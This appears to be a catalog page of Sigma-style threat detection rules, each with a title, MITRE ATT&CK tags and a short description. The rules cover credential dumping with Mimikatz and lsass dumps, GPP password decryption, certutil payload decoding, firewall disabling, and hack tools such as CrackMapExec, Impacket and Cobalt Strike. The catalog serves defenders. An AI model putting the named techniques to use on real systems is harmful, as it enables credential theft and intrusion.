    Detects a successful logon from a public IP address via SMB. This can indicate a publicly-exposed SMB port.

  • Extracting Information with PowerShell

    Aug 12, 2024 · attack.credential-access attack.t1552.001  ·

    Adversaries may search local file systems and remote file shares for files containing insecurely stored credentials. These can be files created by users to store their own credentials, shared credential stores for a group of individuals, configuration files containing passwords for a system or service, or source code/binary files containing embedded passwords.

  • Failed Authentications From Countries You Do Not Operate Out Of

    Aug 12, 2024 · attack.initial-access attack.credential-access attack.t1078.004 attack.t1110  ·

    Detect failed authentications from countries you do not operate out of.

  • Failed DNS Zone Transfer

    Aug 12, 2024 · attack.reconnaissance attack.t1590.002  ·

    Detects when a DNS zone transfer failed.

  • Failed Logon From Public IP

    Aug 12, 2024 · attack.initial-access attack.persistence attack.t1078 attack.t1190 attack.t1133  ·

    Detects a failed logon attempt from a public IP. A login from a public IP can indicate a misconfigured firewall or network boundary.

  • Failed MSExchange Transport Agent Installation

    Aug 12, 2024 · attack.persistence attack.t1505.002  ·

    Detects a failed installation of an Exchange Transport Agent

  • File and Directory Discovery - MacOS

    Aug 12, 2024 · attack.discovery attack.t1083  ·

    Detects usage of system utilities to discover files and directories

  • File And SubFolder Enumeration Via Dir Command

    Aug 12, 2024 · attack.discovery attack.t1217  ·

    Detects usage of the "dir" command, part of Windows CMD, with the "/S" command line flag in order to enumerate files in a specified directory and all subdirectories.

  • File Creation Date Changed to Another Year

    Aug 12, 2024 · attack.t1070.006 attack.defense-evasion  ·

    Attackers may change the file creation time of a backdoor to make it look like it was installed with the operating system. Note that many processes legitimately change the creation time of a file; it does not necessarily indicate malicious activity.

  • File Creation In Suspicious Directory By Msdt.EXE

    Aug 12, 2024 · attack.persistence attack.t1547.001 cve.2022-30190

    Detects msdt.exe creating files in suspicious directories which could be a sign of exploitation of either Follina or Dogwalk vulnerabilities

  • File Decoded From Base64/Hex Via Certutil.EXE

    Aug 12, 2024 · attack.defense-evasion attack.t1027

    Detects the execution of certutil with either the "decode" or "decodehex" flags to decode base64 or hex encoded files. This can be abused by attackers to decode an encoded payload before execution

  • File Decryption Using Gpg4win

    Aug 12, 2024 · attack.execution

    Detects usage of Gpg4win to decrypt files

  • File Deletion

    Aug 12, 2024 · attack.defense-evasion attack.t1070.004

    Detects file deletion using "rm", "shred" or "unlink" commands which are used often by adversaries to delete files left behind by the actions of their intrusion activity

  • File Deletion Via Del

    Aug 12, 2024 · attack.defense-evasion attack.t1070.004

    Detects execution of the builtin "del"/"erase" commands in order to delete files. Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary may leave traces that indicate what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.

  • File Download And Execution Via IEExec.EXE

    Aug 12, 2024 · attack.command-and-control attack.t1105

    Detects execution of the IEExec utility to download and execute files

  • File Download From Browser Process Via Inline URL

    Aug 12, 2024 · attack.command-and-control attack.t1105

    Detects execution of a browser process with a URL argument pointing to a file with a potentially interesting extension. This can be abused to download arbitrary files or to hide from the user for example by launching the browser in a minimized state.

  • File Download Using Notepad++ GUP Utility

    Aug 12, 2024 · attack.command-and-control attack.t1105

    Detects execution of the Notepad++ updater (gup) from a process other than Notepad++ to download files.

  • File Download Using ProtocolHandler.exe

    Aug 12, 2024 · attack.defense-evasion attack.t1218

    Detects usage of "ProtocolHandler" to download files. Downloaded files will be located in the cache folder (for example - %LOCALAPPDATA%\Microsoft\Windows\INetCache\IE)

  • File Download Via Bitsadmin

    Aug 12, 2024 · attack.defense-evasion attack.persistence attack.t1197 attack.s0190 attack.t1036.003

    Detects usage of bitsadmin downloading a file

  • File Download Via Bitsadmin To A Suspicious Target Folder

    Aug 12, 2024 · attack.defense-evasion attack.persistence attack.t1197 attack.s0190 attack.t1036.003

    Detects usage of bitsadmin downloading a file to a suspicious target folder

  • File Download Via Bitsadmin To An Uncommon Target Folder

    Aug 12, 2024 · attack.defense-evasion attack.persistence attack.t1197 attack.s0190 attack.t1036.003

    Detects usage of bitsadmin downloading a file to an uncommon target folder

  • File Download via CertOC.EXE

    Aug 12, 2024 · attack.command-and-control attack.t1105

    Detects when a user downloads a file by using CertOC.exe

  • File Download Via InstallUtil.EXE

    Aug 12, 2024 · attack.defense-evasion attack.t1218

    Detects use of .NET InstallUtil.exe in order to download arbitrary files. The files will be written to "%LOCALAPPDATA%\Microsoft\Windows\INetCache\IE"

  • File Download Via Windows Defender MpCmpRun.EXE

    Aug 12, 2024 · attack.defense-evasion attack.t1218 attack.command-and-control attack.t1105

    Detects the use of Windows Defender MpCmdRun.EXE to download files

  • File Download with Headless Browser

    Aug 12, 2024 · attack.command-and-control attack.t1105

    Detects execution of a Chromium-based browser in headless mode with the "dump-dom" command line flag to download files

  • File Encoded To Base64 Via Certutil.EXE

    Aug 12, 2024 · attack.defense-evasion attack.t1027

    Detects the execution of certutil with the "encode" flag to encode a file to base64. This can be abused by threat actors and attackers for data exfiltration

  • File Encryption Using Gpg4win

    Aug 12, 2024 · attack.execution

    Detects usage of Gpg4win to encrypt files

  • File Encryption/Decryption Via Gpg4win From Suspicious Locations

    Aug 12, 2024 · attack.execution

    Detects usage of Gpg4win to encrypt/decrypt files located in potentially suspicious locations.

  • File or Folder Permissions Change

    Aug 12, 2024 · attack.defense-evasion attack.t1222.002

    Detects file and folder permission changes.

  • File Time Attribute Change

    Aug 12, 2024 · attack.defense-evasion attack.t1070.006

    Detects file time attribute changes used to hide new files or changes to existing files

  • File Time Attribute Change - Linux

    Aug 12, 2024 · attack.defense-evasion attack.t1070.006

    Detects file time attribute changes used to hide new files or changes to existing files.

  • File Was Not Allowed To Run

    Aug 12, 2024 · attack.execution attack.t1204.002 attack.t1059.001 attack.t1059.003 attack.t1059.005 attack.t1059.006 attack.t1059.007

    Detects files that were not allowed to run. AppLocker is a very useful tool, especially on servers where unprivileged users have access, for example terminal servers. You need to configure AppLocker and log collection to receive these events.

  • File With Suspicious Extension Downloaded Via Bitsadmin

    Aug 12, 2024 · attack.defense-evasion attack.persistence attack.t1197 attack.s0190 attack.t1036.003

    Detects usage of bitsadmin downloading a file with a suspicious extension

  • File With Uncommon Extension Created By An Office Application

    Aug 12, 2024 · attack.t1204.002 attack.execution

    Detects the creation of files with an executable or script extension by an Office application.

  • Files Added To An Archive Using Rar.EXE

    Aug 12, 2024 · attack.collection attack.t1560.001

    Detects usage of "rar" to add files to an archive for potential compression. An adversary may compress data (e.g. sensitive documents) that is collected prior to exfiltration in order to make it portable and minimize the amount of data sent over the network.

  • Files With System DLL Name In Unsuspected Locations

    Aug 12, 2024 · attack.defense-evasion attack.t1036.005

    Detects the creation of a file with the ".dll" extension that has the name of a System DLL in uncommon or unsuspected locations (outside of "System32", "SysWOW64", etc.). It is highly recommended to perform an initial baseline before using this rule in production.

  • Files With System Process Name In Unsuspected Locations

    Aug 12, 2024 · attack.defense-evasion attack.t1036.005

    Detects the creation of an executable with a system process name in folders other than the system ones (System32, SysWOW64, etc.). It is highly recommended to perform an initial baseline before using this rule in production.

  • Filter Driver Unloaded Via Fltmc.EXE

    Aug 12, 2024 · attack.defense-evasion attack.t1070 attack.t1562 attack.t1562.002

    Detect filter driver unloading activity via fltmc.exe

  • Findstr GPP Passwords

    Aug 12, 2024 · attack.credential-access attack.t1552.006

    Look for the encrypted cpassword value within Group Policy Preference files on the Domain Controller. This value can be decrypted with gpp-decrypt.

  • Findstr Launching .lnk File

    Aug 12, 2024 · attack.defense-evasion attack.t1036 attack.t1202 attack.t1027.003

    Detects usage of findstr to identify and execute a lnk file as seen within the HHS redirect attack

  • Finger.EXE Execution

    Aug 12, 2024 · attack.command-and-control attack.t1105

    Detects execution of the "finger.exe" utility. Finger.EXE or "TCPIP Finger Command" is an old utility that is still present on modern Windows installations. It displays information about users on a specified remote computer (typically a UNIX computer) that is running the finger service or daemon. Due to the age of this utility and the rarity of machines running the finger service, any execution of "finger.exe" can be considered "suspicious" and worth investigating.

  • Fireball Archer Install

    Aug 12, 2024 · attack.execution attack.defense-evasion attack.t1218.011 detection.emerging-threats

    Detects Archer malware invocation via rundll32

  • Firewall Disabled via Netsh.EXE

    Aug 12, 2024 · attack.defense-evasion attack.t1562.004 attack.s0108

    Detects netsh commands that turn off the Windows firewall

  • Firewall Rule Deleted Via Netsh.EXE

    Aug 12, 2024 · attack.defense-evasion attack.t1562.004

    Detects the removal of a port or application rule in the Windows Firewall configuration using netsh

  • Firewall Rule Update Via Netsh.EXE

    Aug 12, 2024 · attack.defense-evasion

    Detects execution of netsh with the "advfirewall" and the "set" option in order to set new values for properties of an existing rule

  • First Time Seen Remote Named Pipe

    Aug 12, 2024 · attack.lateral-movement attack.t1021.002

    This detection excludes known named pipes accessible remotely and notifies on newly observed ones, which may help to detect lateral movement and remote execution using named pipes

  • First Time Seen Remote Named Pipe - Zeek

    Aug 12, 2024 · attack.lateral-movement attack.t1021.002

    This detection excludes known named pipes accessible remotely and notifies on newly observed ones, which may help to detect lateral movement and remote execution using named pipes

  • Flash Player Update from Suspicious Location

    Aug 12, 2024 · attack.initial-access attack.t1189 attack.execution attack.t1204.002 attack.defense-evasion attack.t1036.005

    Detects a Flash Player update from an unofficial location

  • FlowCloud Registry Markers

    Aug 12, 2024 · attack.persistence attack.t1112

    Detects FlowCloud malware registry markers from threat group TA410. The malware stores its configuration in the registry alongside drivers utilized by the malware's keylogger components.

  • Flush Iptables Ufw Chain

    Aug 12, 2024 · attack.defense-evasion attack.t1562.004

    Detect use of iptables to flush all firewall rules, tables and chains and allow all network traffic

  • FoggyWeb Backdoor DLL Loading

    Aug 12, 2024 · attack.resource-development attack.t1587 detection.emerging-threats

    Detects the DLL hijacking technique used by NOBELIUM in their FoggyWeb backdoor, which loads a malicious version of the expected "version.dll"

  • Folder Compress To Potentially Suspicious Output Via Compress-Archive Cmdlet

    Aug 12, 2024 · attack.collection attack.t1074.001

    Detects PowerShell scripts that make use of the "Compress-Archive" Cmdlet in order to compress folders and files where the output is stored in a potentially suspicious location that is used often by malware for exfiltration. An adversary might compress data (e.g., sensitive documents) that is collected prior to exfiltration in order to make it portable and minimize the amount of data sent over the network.

  • Folder Removed From Exploit Guard ProtectedFolders List - Registry

    Aug 12, 2024 · attack.defense-evasion attack.t1562.001

    Detects the removal of folders from the "ProtectedFolders" list of Exploit Guard. This could indicate an attacker trying to launch an encryption process or trying to manipulate data inside of the protected folder

  • Forfiles Command Execution

    Aug 12, 2024 · attack.execution attack.t1059

    Detects the execution of "forfiles" with the "/c" flag. While this is an expected behavior of the tool, it can be abused in order to proxy execution through it with any binary. Can be used to bypass application whitelisting.

  • Formbook Process Creation

    Aug 12, 2024 · attack.resource-development attack.t1587.001 detection.emerging-threats

    Detects Formbook-like process executions that inject code into a set of files in the System32 folder, which executes a special command line to delete the dropper from the AppData Temp folder. We avoid false positives by excluding all parent processes with command line parameters.

  • Fortinet CVE-2018-13379 Exploitation

    Aug 12, 2024 · attack.initial-access attack.t1190 cve.2018-13379 detection.emerging-threats

    Detects CVE-2018-13379 exploitation attempt against Fortinet SSL VPNs

  • Fortinet CVE-2021-22123 Exploitation

    Aug 12, 2024 · attack.initial-access attack.t1190 cve.2021-22123 detection.emerging-threats

    Detects CVE-2021-22123 exploitation attempt against Fortinet WAFs

  • Fsutil Behavior Set SymlinkEvaluation

    Aug 12, 2024 · attack.execution attack.t1059

    Detects fsutil being used to set the symbolic link evaluation behavior. A symbolic link is a type of file that contains a reference to another file. This is probably done to make sure that the ransomware is able to follow shortcuts on the machine in order to find the original file to encrypt

  • Fsutil Drive Enumeration

    Aug 12, 2024 · attack.discovery attack.t1120

    Attackers may leverage fsutil to enumerate connected drives.

  • Fsutil Suspicious Invocation

    Aug 12, 2024 · attack.defense-evasion attack.impact attack.t1070 attack.t1485

    Detects suspicious parameters of fsutil (deleting the USN journal, configuring it with a small size, etc.). Might be used by ransomware during an attack (seen with NotPetya and others).

  • Function Call From Undocumented COM Interface EditionUpgradeManager

    Aug 12, 2024 · attack.defense-evasion attack.privilege-escalation attack.t1548.002

    Detects function calls from the EditionUpgradeManager COM interface, an interface that is not used by standard executables.

  • GAC DLL Loaded Via Office Applications

    Aug 12, 2024 · attack.execution attack.t1204.002

    Detects any GAC DLL being loaded by an Office Product

  • GALLIUM Artefacts - Builtin

    Aug 12, 2024 · attack.credential-access attack.command-and-control attack.t1071 detection.emerging-threats

    Detects artefacts associated with activity group GALLIUM - Microsoft Threat Intelligence Center indicators released in December 2019.

  • Gatekeeper Bypass via Xattr

    Aug 12, 2024 · attack.defense-evasion attack.t1553.001

    Detects macOS Gatekeeper bypass via xattr utility

  • GatherNetworkInfo.VBS Reconnaissance Script Output

    Aug 12, 2024 · attack.discovery

    Detects creation of files which are the results of executing the built-in reconnaissance script "C:\Windows\System32\gatherNetworkInfo.vbs".

  • Get-ADUser Enumeration Using UserAccountControl Flags

    Aug 12, 2024 · attack.discovery attack.t1033

    Detects AS-REP roasting, an attack that is often overlooked. It is not very common, as you have to explicitly set accounts that do not require pre-authentication.

  • Github Delete Action Invoked

    Aug 12, 2024 · attack.impact attack.collection attack.t1213.003

    Detects delete action in the Github audit logs for codespaces, environment, project and repo.

  • Github Fork Private Repositories Setting Enabled/Cleared

    Aug 12, 2024 · attack.persistence attack.t1020 attack.t1537

    Detects when the policy allowing forks of private and internal repositories is changed (enabled or cleared).

  • Github High Risk Configuration Disabled

    Aug 12, 2024 · attack.credential-access attack.defense-evasion attack.persistence attack.t1556

    Detects when a user disables a critical security feature for an organization.

  • Github New Secret Created

    Aug 12, 2024 · attack.defense-evasion attack.persistence attack.privilege-escalation attack.initial-access attack.t1078.004

    Detects when a user creates an action secret for the organization, environment, codespaces or repository.

  • Github Outside Collaborator Detected

    Aug 12, 2024 · attack.persistence attack.collection attack.t1098.001 attack.t1098.003 attack.t1213.003

    Detects when an organization member or an outside collaborator is added to or removed from a project board or has their permission level changed; when an owner removes an outside collaborator from an organization; or when two-factor authentication is required in an organization and an outside collaborator does not use 2FA or disables 2FA.

  • Github Repository/Organization Transferred

    Aug 12, 2024 · attack.persistence attack.t1020 attack.t1537

    Detects when a repository or an organization is being transferred to another location.

  • Github Secret Scanning Feature Disabled

    Aug 12, 2024 · attack.defense-evasion attack.t1562.001

    Detects if the secret scanning feature is disabled for an enterprise or repository.

  • Github Self Hosted Runner Changes Detected

    Aug 12, 2024 · attack.impact attack.discovery attack.collection attack.defense-evasion attack.persistence attack.privilege-escalation attack.initial-access attack.t1526 attack.t1213.003 attack.t1078.004

    A self-hosted runner is a system that you deploy and manage to execute jobs from GitHub Actions on GitHub.com. This rule detects changes to self-hosted runner configurations in the environment. Once a self-hosted runner configuration change is detected, it should be validated in the GitHub UI because the log entry may not provide full context.

  • Github SSH Certificate Configuration Changed

    Aug 12, 2024 · attack.persistence attack.privilege-escalation attack.t1078.004

    Detects when changes are made to the SSH certificate configuration of the organization.

  • Goofy Guineapig Backdoor IOC

    Aug 12, 2024 · attack.execution attack.defense-evasion detection.emerging-threats

    Detects malicious indicators seen used by the Goofy Guineapig malware

  • Goofy Guineapig Backdoor Potential C2 Communication

    Aug 12, 2024 · attack.command-and-control detection.emerging-threats

    Detects potential C2 communication related to Goofy Guineapig backdoor

  • Goofy Guineapig Backdoor Service Creation

    Aug 12, 2024 · attack.persistence detection.emerging-threats

    Detects service creation persistence used by the Goofy Guineapig backdoor

  • Google Cloud DNS Zone Modified or Deleted

    Aug 12, 2024 · attack.impact

    Identifies when a DNS Zone is modified or deleted in Google Cloud.

  • Google Cloud Firewall Modified or Deleted

    Aug 12, 2024 · attack.defense-evasion attack.t1562

    Detects when a firewall rule is modified or deleted in Google Cloud Platform (GCP).

  • Google Cloud Kubernetes Admission Controller

    Aug 12, 2024 · attack.persistence attack.t1078 attack.credential-access attack.t1552 attack.t1552.007

    Identifies when an admission controller is executed in GCP Kubernetes. A Kubernetes admission controller intercepts, and possibly modifies, requests to the Kubernetes API server. The behavior of this admission controller is determined by an admission webhook (MutatingAdmissionWebhook or ValidatingAdmissionWebhook) that the user deploys in the cluster. An adversary can use such webhooks, for example the MutatingAdmissionWebhook, to obtain persistence in the cluster: attackers can intercept and modify the pod creation operations in the cluster and add their malicious container to every created pod. An adversary can also use the ValidatingAdmissionWebhook to obtain access credentials, by intercepting the requests to the API server and recording secrets and other sensitive information.

  • Google Cloud Kubernetes CronJob

    Aug 12, 2024 · attack.persistence attack.privilege-escalation attack.execution

    Identifies when a Google Cloud Kubernetes CronJob runs in Azure Cloud. A Kubernetes Job is a controller that creates one or more pods and ensures that a specified number of them successfully terminate. A Kubernetes Job can be used to run containers that perform finite tasks for batch jobs. A Kubernetes CronJob is used to schedule Jobs. An adversary may use a Kubernetes CronJob for scheduling execution of malicious code that would run as a container in the cluster.

  • Google Cloud Kubernetes RoleBinding

    Aug 12, 2024 · attack.credential-access

    Detects the creation or patching of potentially malicious RoleBindings. This includes RoleBindings and ClusterRoleBindings.

  • Google Cloud Kubernetes Secrets Modified or Deleted

    Aug 12, 2024 · attack.credential-access

    Identifies when Kubernetes Secrets are modified or deleted.

  • Google Cloud Re-identifies Sensitive Information

    Aug 12, 2024 · attack.impact attack.t1565

    Identifies when sensitive information is re-identified in Google Cloud.

  • Google Cloud Service Account Disabled or Deleted

    Aug 12, 2024 · attack.impact attack.t1531

    Identifies when a service account is disabled or deleted in Google Cloud.

  • Google Cloud Service Account Modified

    Aug 12, 2024 · attack.impact

    Identifies when a service account is modified in Google Cloud.

  • Google Cloud SQL Database Modified or Deleted

    Aug 12, 2024 · attack.impact

    Detect when a Cloud SQL DB has been modified or deleted.

  • Google Cloud Storage Buckets Enumeration

    Aug 12, 2024 · attack.discovery

    Detects when a storage bucket is enumerated in Google Cloud.

  • Google Cloud Storage Buckets Modified or Deleted

    Aug 12, 2024 · attack.impact

    Detects when a storage bucket is modified or deleted in Google Cloud.

  • Google Cloud VPN Tunnel Modified or Deleted

    Aug 12, 2024 · attack.impact

    Identifies when a VPN tunnel is modified or deleted in Google Cloud.

  • Google Full Network Traffic Packet Capture

    Aug 12, 2024 · attack.collection attack.t1074

    Identifies potential full network packet capture in GCP. This feature can potentially be abused to read sensitive data from unencrypted internal traffic.

  • Google Workspace Application Removed

    Aug 12, 2024 · attack.impact

    Detects when an application is removed from Google Workspace.

  • Google Workspace Granted Domain API Access

    Aug 12, 2024 · attack.persistence attack.t1098

    Detects when an API access service account is granted domain authority.

  • Google Workspace MFA Disabled

    Aug 12, 2024 · attack.impact

    Detects when multi-factor authentication (MFA) is disabled.

  • Google Workspace Role Modified or Deleted

    Aug 12, 2024 · attack.impact

    Detects when a role is modified or deleted in Google Workspace.

  • Google Workspace Role Privilege Deleted

    Aug 12, 2024 · attack.impact

    Detects when a role privilege is deleted in Google Workspace.

  • Google Workspace User Granted Admin Privileges

    Aug 12, 2024 · attack.persistence attack.t1098

    Detects when a Google Workspace user is granted admin privileges.

  • GoToAssist Temporary Installation Artefact

    Aug 12, 2024 · attack.command-and-control attack.t1219

    An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks. These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment. Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)

  • Gpresult Display Group Policy Information

    Aug 12, 2024 · attack.discovery attack.t1615

    Detects cases in which a user uses the built-in Windows utility gpresult to display the Resultant Set of Policy (RSoP) information

  • Gpscript Execution

    Aug 12, 2024 · attack.defense-evasion attack.t1218

    Detects the execution of the LOLBIN gpscript, which executes logon or startup scripts configured in Group Policy

  • Grafana Path Traversal Exploitation CVE-2021-43798

    Aug 12, 2024 · attack.initial-access attack.t1190 cve.2021-43798 detection.emerging-threats

    Detects a successful Grafana path traversal exploitation

  • Granting Of Permissions To An Account

    Aug 12, 2024 · attack.persistence attack.t1098.003

    Identifies IPs from which users grant access to other users on Azure resources and alerts when a previously unseen source IP address is used.

  • Greedy File Deletion Using Del

    Aug 12, 2024 · attack.defense-evasion attack.t1070.004

    Detects execution of the "del" builtin command to remove files using a greedy/wildcard expression. This is often used by malware to delete the content of folders that might contain the initial malware infection or to delete evidence.

  • Greenbug Espionage Group Indicators

    Aug 12, 2024 · attack.g0049 attack.execution attack.t1059.001 attack.command-and-control attack.t1105 attack.defense-evasion attack.t1036.005 detection.emerging-threats

    Detects tools and process executions used by Greenbug in their May 2020 campaign as reported by Symantec

  • Griffon Malware Attack Pattern

    Aug 12, 2024 · attack.execution detection.emerging-threats

    Detects process execution patterns related to Griffon malware as reported by Kaspersky

  • Group Has Been Deleted Via Groupdel

    calendar Aug 12, 2024 · attack.impact attack.t1531  ·
    Share on: twitter facebook linkedin copy

    Detects execution of the "groupdel" binary. Which is used to delete a group. This is sometimes abused by threat actors in order to cover their tracks


    Read More
  • Group Membership Reconnaissance Via Whoami.EXE

    calendar Aug 12, 2024 · attack.discovery attack.t1033  ·
    Share on: twitter facebook linkedin copy

    Detects the execution of whoami.exe with the /group command line flag to show group membership for the current user, account type, security identifiers (SID), and attributes.


    Read More
  • Guacamole Two Users Sharing Session Anomaly

    Aug 12, 2024 · attack.credential-access attack.t1212

    Detects a suspicious session with two users present

  • Guest Account Enabled Via Sysadminctl

    Aug 12, 2024 · attack.initial-access attack.t1078 attack.t1078.001

    Detects attempts to enable the guest account using the sysadminctl utility

  • Guest User Invited By Non Approved Inviters

    Aug 12, 2024 · attack.persistence attack.defense-evasion attack.t1078.004

    Detects when a user that doesn't have permissions to invite a guest user attempts to invite one.

  • Guest Users Invited To Tenant By Non Approved Inviters

    Aug 12, 2024 · attack.initial-access attack.t1078

    Detects guest users being invited to the tenant by non-approved inviters

  • GUI Input Capture - macOS

    Aug 12, 2024 · attack.credential-access attack.t1056.002

    Detects attempts to use system dialog prompts to capture user credentials

  • Gzip Archive Decode Via PowerShell

    Aug 12, 2024 · attack.command-and-control attack.t1132.001

    Detects attempts at decoding encoded Gzip archives via PowerShell.

  • Hack Tool User Agent

    Aug 12, 2024 · attack.initial-access attack.t1190 attack.credential-access attack.t1110

    Detects suspicious user agent strings used by hack tools in proxy logs

  • HackTool - ADCSPwn Execution

    Aug 12, 2024 · attack.credential-access attack.t1557.001

    Detects command line parameters used by ADCSPwn, a tool to escalate privileges in an Active Directory network by coercing authentication from machine accounts and relaying it to the certificate service

  • HackTool - BabyShark Agent Default URL Pattern

    Aug 12, 2024 · attack.command-and-control attack.t1071.001

    Detects Baby Shark C2 Framework default communication patterns

  • HackTool - Bloodhound/Sharphound Execution

    Aug 12, 2024 · attack.discovery attack.t1087.001 attack.t1087.002 attack.t1482 attack.t1069.001 attack.t1069.002 attack.execution attack.t1059.001

    Detects command line parameters used by the Bloodhound and Sharphound hack tools

  • HackTool - CACTUSTORCH Remote Thread Creation

    Aug 12, 2024 · attack.defense-evasion attack.execution attack.t1055.012 attack.t1059.005 attack.t1059.007 attack.t1218.005

    Detects remote thread creation from CACTUSTORCH as described in the references.

  • HackTool - Certify Execution

    Aug 12, 2024 · attack.discovery attack.credential-access attack.t1649

    Detects Certify, a tool for Active Directory certificate abuse, based on PE metadata characteristics and common command line arguments.

  • HackTool - CobaltStrike BOF Injection Pattern

    Aug 12, 2024 · attack.execution attack.t1106 attack.defense-evasion attack.t1562.001

    Detects a typical pattern of a CobaltStrike BOF which injects into other processes

  • HackTool - CobaltStrike Malleable Profile Patterns - Proxy

    Aug 12, 2024 · attack.defense-evasion attack.command-and-control attack.t1071.001

    Detects Cobalt Strike malleable profile patterns (URI, User-Agents, Methods).

  • HackTool - Covenant PowerShell Launcher

    Aug 12, 2024 · attack.execution attack.defense-evasion attack.t1059.001 attack.t1564.003

    Detects suspicious command lines used in Covenant launchers

  • HackTool - CrackMapExec Execution

    Aug 12, 2024 · attack.execution attack.persistence attack.privilege-escalation attack.credential-access attack.discovery attack.t1047 attack.t1053 attack.t1059.003 attack.t1059.001 attack.t1110 attack.t1201

    This rule detects common flag combinations used by CrackMapExec in order to detect its use even if the binary has been renamed.

  • HackTool - CrackMapExec Execution Patterns

    Aug 12, 2024 · attack.execution attack.t1047 attack.t1053 attack.t1059.003 attack.t1059.001 attack.s0106

    Detects various execution patterns of the CrackMapExec pentesting framework

  • HackTool - CrackMapExec File Indicators

    Aug 12, 2024 · attack.credential-access attack.t1003.001

    Detects file creation events with filename patterns used by CrackMapExec.

  • HackTool - CrackMapExec PowerShell Obfuscation

    Aug 12, 2024 · attack.execution attack.t1059.001 attack.defense-evasion attack.t1027.005

    The CrackMapExec pentesting framework implements a PowerShell obfuscation with some static strings detected by this rule.

  • HackTool - CrackMapExec Process Patterns

    Aug 12, 2024 · attack.credential-access attack.t1003.001

    Detects suspicious process patterns found in logs when CrackMapExec is used

  • HackTool - Credential Dumping Tools Named Pipe Created

    Aug 12, 2024 · attack.credential-access attack.t1003.001 attack.t1003.002 attack.t1003.004 attack.t1003.005

    Detects the execution of well-known credential dumping tools via specific named pipe creation

  • HackTool - Default PowerSploit/Empire Scheduled Task Creation

    Aug 12, 2024 · attack.execution attack.persistence attack.privilege-escalation attack.s0111 attack.g0022 attack.g0060 car.2013-08-001 attack.t1053.005 attack.t1059.001

    Detects the creation of a schtask via the PowerSploit or Empire default configuration.

  • HackTool - DiagTrackEoP Default Named Pipe

    Aug 12, 2024 · attack.privilege-escalation

    Detects creation of the default named pipe used by the DiagTrackEoP POC, a tool that abuses the "SeImpersonate" privilege.

  • HackTool - Dumpert Process Dumper Default File

    Aug 12, 2024 · attack.credential-access attack.t1003.001

    Detects the creation of the default dump file used by the Outflank Dumpert tool, a process dumper which dumps the lsass process memory

  • HackTool - Empire PowerShell Launch Parameters

    Aug 12, 2024 · attack.execution attack.t1059.001

    Detects suspicious PowerShell command line parameters used in Empire

  • HackTool - Empire PowerShell UAC Bypass

    Aug 12, 2024 · attack.defense-evasion attack.privilege-escalation attack.t1548.002 car.2019-04-001

    Detects some Empire PowerShell UAC bypass methods

  • HackTool - Empire UserAgent URI Combo

    Aug 12, 2024 · attack.defense-evasion attack.command-and-control attack.t1071.001

    Detects user agent and URI paths used by Empire agents

  • HackTool - F-Secure C3 Load by Rundll32

    Aug 12, 2024 · attack.defense-evasion attack.t1218.011

    F-Secure C3 produces DLLs with a default exported StartNodeRelay function.

  • HackTool - Hashcat Password Cracker Execution

    Aug 12, 2024 · attack.credential-access attack.t1110.002

    Execution of Hashcat.exe with a provided SAM file from the Windows registry and a password list to crack against

  • HackTool - Htran/NATBypass Execution

    Aug 12, 2024 · attack.command-and-control attack.t1090 attack.s0040

    Detects executable names or flags used by Htran or Htran-like tools (e.g. NATBypass)

  • HackTool - Hydra Password Bruteforce Execution

    Aug 12, 2024 · attack.credential-access attack.t1110 attack.t1110.001

    Detects command line parameters used by the Hydra password guessing hack tool

  • HackTool - Impacket Tools Execution

    Aug 12, 2024 · attack.execution attack.t1557.001

    Detects the execution of different compiled Windows binaries of the Impacket toolset (based on names or parts of their names; could lead to false positives)

  • HackTool - Inveigh Execution

    Aug 12, 2024 · attack.credential-access attack.t1003.001

    Detects the use of Inveigh, a cross-platform .NET IPv4/IPv6 machine-in-the-middle tool

  • HackTool - Inveigh Execution Artefacts

    Aug 12, 2024 · attack.command-and-control attack.t1219

    Detects the presence and execution of Inveigh via dropped artefacts

  • HackTool - Jlaive In-Memory Assembly Execution

    Aug 12, 2024 · attack.execution attack.t1059.003

    Detects the use of Jlaive to execute assemblies in a copied PowerShell

  • HackTool - Koadic Execution

    Aug 12, 2024 · attack.execution attack.t1059.003 attack.t1059.005 attack.t1059.007

    Detects command line parameters used by the Koadic hack tool

  • HackTool - Koh Default Named Pipe

    Aug 12, 2024 · attack.privilege-escalation attack.credential-access attack.t1528 attack.t1134.001

    Detects creation of default named pipes used by the Koh tool

  • HackTool - KrbRelay Execution

    Aug 12, 2024 · attack.credential-access attack.t1558.003

    Detects the use of KrbRelay, a Kerberos relaying tool

  • HackTool - KrbRelayUp Execution

    Aug 12, 2024 · attack.credential-access attack.t1558.003 attack.lateral-movement attack.t1550.003

    Detects KrbRelayUp used to perform a universal no-fix local privilege escalation in Windows domain environments where LDAP signing is not enforced

  • HackTool - LittleCorporal Generated Maldoc Injection

    Aug 12, 2024 · attack.execution attack.t1204.002 attack.t1055.003

    Detects the process injection of a LittleCorporal generated Maldoc.

  • HackTool - Mimikatz Execution

    Aug 12, 2024 · attack.credential-access attack.t1003.001 attack.t1003.002 attack.t1003.004 attack.t1003.005 attack.t1003.006

    Detects well-known Mimikatz command line arguments

  • HackTool - Mimikatz Kirbi File Creation

    Aug 12, 2024 · attack.credential-access attack.t1558

    Detects the creation of files written by Mimikatz such as ".kirbi", "mimilsa.log", etc.

  • HackTool - NPPSpy Hacktool Usage

    Aug 12, 2024 · attack.credential-access

    Detects the use of the NPPSpy hacktool, which stores the cleartext passwords of users that logged in to a local file

  • HackTool - Potential CobaltStrike Process Injection

    Aug 12, 2024 · attack.defense-evasion attack.t1055.001

    Detects a potential remote thread creation with certain characteristics which are typical for Cobalt Strike beacons

  • HackTool - Potential Impacket Lateral Movement Activity

    Aug 12, 2024 · attack.execution attack.t1047 attack.lateral-movement attack.t1021.003

    Detects wmiexec/dcomexec/atexec/smbexec from the Impacket framework

  • HackTool - Potential Remote Credential Dumping Activity Via CrackMapExec Or Impacket-Secretsdump

    Aug 12, 2024 · attack.credential-access attack.t1003

    Detects default filenames output from the execution of CrackMapExec and Impacket-secretsdump against an endpoint.

  • HackTool - PowerTool Execution

    Aug 12, 2024 · attack.defense-evasion attack.t1562.001

    Detects the execution of the tool PowerTool, which has the ability to kill a process, delete its process file, unload drivers, and delete the driver files

